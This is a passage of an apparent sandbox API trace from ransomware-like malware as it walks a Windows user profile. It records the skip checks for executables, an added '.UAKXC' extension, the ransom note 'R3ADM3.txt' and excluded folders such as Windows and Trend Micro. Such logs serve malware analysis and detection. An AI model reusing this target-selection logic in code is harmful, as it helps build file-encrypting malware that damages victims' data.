ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0141.330] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2=".") returned 1 [0141.330] lstrcmpW (lpString1="ntuser.dat.LOG2", lpString2="..") returned 1 [0141.330] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch=".UAKXC") returned 0x0 [0141.330] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch=".exe") returned 0x0 [0141.330] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch=".dll") returned 0x0 [0141.330] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch=".lnk") returned 0x0 [0141.330] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch=".sys") returned 0x0 [0141.330] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch=".msi") returned 0x0 [0141.330] StrStrIW (lpFirst="ntuser.dat.LOG2", lpSrch="R3ADM3.txt") returned 0x0 [0141.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b28 [0141.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.330] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0141.330] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2b28 | out: hHeap=0xea0000) returned 1 [0141.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0141.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b28 [0141.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec630 [0141.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0141.331] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.331] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f60c40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f60c40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0141.331] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2=".") returned 1 [0141.331] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpString2="..") returned 1 [0141.331] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".UAKXC") returned 0x0 [0141.331] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".exe") returned 0x0 [0141.331] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".dll") returned 0x0 [0141.331] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".lnk") returned 0x0 [0141.331] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".sys") returned 0x0 [0141.331] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch=".msi") returned 0x0 [0141.331] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf", lpSrch="R3ADM3.txt") returned 0x0 [0141.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeee78 [0141.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.331] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0xedaa80 [0141.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeee78 | out: hHeap=0xea0000) returned 1 [0141.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0xedab38 [0141.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b50 [0141.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xb0) returned 0xef0918 [0141.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedab38 | out: hHeap=0xea0000) returned 1 [0141.332] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaa80 | out: hHeap=0xea0000) returned 1 [0141.332] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0141.332] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2=".") returned 1 [0141.332] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpString2="..") returned 1 [0141.332] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".UAKXC") returned 0x0 [0141.332] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".exe") returned 0x0 [0141.332] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".dll") returned 0x0 [0141.332] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".lnk") returned 0x0 [0141.332] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".sys") returned 0x0 [0141.332] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch=".msi") returned 0x0 [0141.332] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpSrch="R3ADM3.txt") returned 0x0 [0141.332] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xedaa80 [0141.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x100) returned 0xef09d0 [0141.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaa80 | out: hHeap=0xea0000) returned 1 [0141.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x100) returned 0xedaa80 [0141.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2b78 [0141.333] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x100) returned 0xef0ad8 [0141.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaa80 | out: hHeap=0xea0000) returned 1 [0141.333] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef09d0 | out: hHeap=0xea0000) returned 1 [0141.333] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0141.333] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2=".") returned 1 [0141.333] lstrcmpW (lpString1="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpString2="..") returned 1 [0141.333] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".UAKXC") returned 0x0 [0141.333] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".exe") returned 0x0 [0141.333] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".dll") returned 0x0 [0141.333] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".lnk") returned 0x0 [0141.333] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".sys") returned 0x0 [0141.334] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch=".msi") returned 0x0 [0141.334] StrStrIW (lpFirst="NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpSrch="R3ADM3.txt") returned 0x0 [0141.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0xc0) returned 0xef09d0 [0141.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x100) returned 0xedaa80 [0141.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef09d0 | out: hHeap=0xea0000) returned 1 [0141.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x100) returned 0xef09d0 [0141.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2ba0 [0141.334] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x100) returned 0xef0be0 [0141.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef09d0 | out: hHeap=0xea0000) returned 1 [0141.334] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedaa80 | out: hHeap=0xea0000) returned 1 [0141.334] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cd94e0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0141.334] lstrcmpW (lpString1="ntuser.ini", lpString2=".") returned 1 [0141.334] lstrcmpW (lpString1="ntuser.ini", lpString2="..") returned 1 [0141.334] StrStrIW (lpFirst="ntuser.ini", lpSrch=".UAKXC") returned 0x0 [0141.334] StrStrIW (lpFirst="ntuser.ini", lpSrch=".exe") returned 0x0 [0141.334] StrStrIW (lpFirst="ntuser.ini", lpSrch=".dll") returned 0x0 [0141.334] StrStrIW (lpFirst="ntuser.ini", lpSrch=".lnk") returned 0x0 [0141.335] StrStrIW (lpFirst="ntuser.ini", lpSrch=".sys") returned 0x0 [0141.335] StrStrIW (lpFirst="ntuser.ini", lpSrch=".msi") returned 0x0 [0141.335] StrStrIW (lpFirst="ntuser.ini", lpSrch="R3ADM3.txt") returned 0x0 [0141.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2bc8 [0141.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0141.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2bc8 | out: hHeap=0xea0000) returned 1 [0141.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0141.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2bc8 [0141.335] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec698 [0141.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec560 | out: hHeap=0xea0000) returned 1 [0141.335] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.335] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb886060, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb886060, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0141.335] lstrcmpW (lpString1="Pictures", lpString2=".") returned 1 [0141.335] lstrcmpW (lpString1="Pictures", lpString2="..") returned 1 [0141.335] StrStrIW (lpFirst="Pictures", lpSrch="tmp") returned 0x0 [0141.335] StrStrIW (lpFirst="Pictures", lpSrch="winnt") returned 0x0 [0141.335] StrStrIW (lpFirst="Pictures", lpSrch="temp") returned 0x0 [0141.335] StrStrIW (lpFirst="Pictures", lpSrch="thumb") returned 0x0 [0141.336] StrStrIW (lpFirst="Pictures", lpSrch="$Recycle.Bin") returned 0x0 [0141.336] StrStrIW (lpFirst="Pictures", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.336] StrStrIW (lpFirst="Pictures", lpSrch="System Volume Information") returned 0x0 [0141.336] StrStrIW (lpFirst="Pictures", lpSrch="Boot") returned 0x0 [0141.336] StrStrIW (lpFirst="Pictures", lpSrch="Windows") returned 0x0 [0141.336] StrStrIW (lpFirst="Pictures", lpSrch="Trend Micro") returned 0x0 [0141.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2bf0 [0141.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2bf0 | out: hHeap=0xea0000) returned 1 [0141.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2bf0 [0141.336] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec34a0 [0141.336] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.336] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0141.336] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0141.336] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0141.336] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59642550, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x59642550, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x596686b0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 1 [0141.336] lstrcmpW (lpString1="R3ADM3.txt", lpString2=".") returned 1 [0141.336] lstrcmpW (lpString1="R3ADM3.txt", lpString2="..") returned 1 [0141.337] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0141.337] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0141.337] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0141.337] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0141.337] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0141.337] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0141.337] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0141.337] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0141.337] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0141.337] lstrcmpW (lpString1="Recent", lpString2="..") returned 1 [0141.337] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d22d5a0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0141.337] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0141.337] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="tmp") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="winnt") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="temp") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="thumb") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="$Recycle.Bin") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="System Volume Information") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="Boot") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="Windows") returned 0x0 [0141.337] StrStrIW (lpFirst="Saved Games", lpSrch="Trend Micro") returned 0x0 [0141.337] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2c18 [0141.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0141.338] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.338] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.338] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2c18 | out: hHeap=0xea0000) returned 1 [0141.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2c18 [0141.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec560 [0141.338] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.338] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28de3e80, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0141.338] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0141.338] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="tmp") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="winnt") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="temp") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="thumb") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="$Recycle.Bin") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="$RECYCLE.BIN") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="System Volume Information") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="Boot") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="Windows") returned 0x0 [0141.338] StrStrIW (lpFirst="Searches", lpSrch="Trend Micro") returned 0x0 [0141.338] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2c40 [0141.339] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0141.339] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcae0 [0141.339] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x5e) returned 0xeec3c0 [0141.339] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcae0 | out: hHeap=0xea0000) returned 1 [0141.339] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0141.339] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef2c40 | out: hHeap=0xea0000) returned 1 [0141.339] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2c40 [0141.339] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec34f8 [0141.339] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeec3c0 | out: hHeap=0xea0000) returned 1 [0141.339] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0141.339] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0141.339] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0141.339] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29129cc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29129cc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29129cc0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", 